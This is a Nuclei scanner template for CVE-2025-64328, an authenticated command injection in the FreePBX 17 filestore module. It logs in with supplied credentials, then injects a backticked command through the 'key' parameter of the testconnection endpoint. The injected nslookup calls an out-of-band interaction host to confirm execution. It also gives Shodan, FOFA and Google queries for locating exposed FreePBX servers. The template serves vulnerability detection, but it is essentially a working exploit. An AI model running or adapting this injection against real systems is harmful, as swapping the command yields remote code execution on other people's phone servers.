id: CVE-2025-64328

info:
  name: FreePBX - Authenticated Command Injection in Administration panel
  author: _th3y
  severity: high
  description: |
    FreePBX 17 contains a command injection caused by insufficiently sanitized user-supplied data in the testconnection -> check_ssh_connect() function within the filestore module, allowing authenticated attackers to execute arbitrary shell commands as the asterisk user.
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 8.6
    cve-id: CVE-2025-64328
    cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*
  reference:
    - https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw
    - https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/
  metadata:
    vendor: sangoma
    product: freepbx
    shodan-query:
      - http.title:"freepbx"
      - http.favicon.hash:"-1908328911"
      - http.favicon.hash:"1574423538"
      - http.title:"freepbx administration"
    fofa-query:
      - icon_hash="-1908328911"
      - icon_hash="1574423538"
      - title="freepbx administration"
      - title="freepbx"
    google-query:
      - intitle:"freepbx administration"
      - intitle:"freepbx"
  tags: cve,cve2025,freepbx,rce,oast,authenticated,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"
  cmd: "nslookup {{interactsh-url}}"
  prefix: "{{rand_text_alpha(5)}}"

flow: http(1) && http(2)

http:
  - method: POST
    path:
      - "{{BaseURL}}/admin/config.php"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "username={{username}}&password={{password}}"
    matchers:
      - type: word
        part: body
        words:
          - 'FreePBX Administration'
          - 'Hello, {{username}}'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user={{prefix}}&port=22&key={{prefix}}`{{cmd}}`&path={{prefix}}"
    headers:
      Referer: "{{BaseURL}}"
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"